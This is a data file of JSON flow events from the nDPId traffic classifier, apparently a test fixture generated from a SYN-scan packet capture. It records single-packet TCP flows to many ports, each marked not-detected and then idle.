+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":90,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61532,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61532,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":99,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8291,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":99,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8291,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14441,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14441,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":109,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 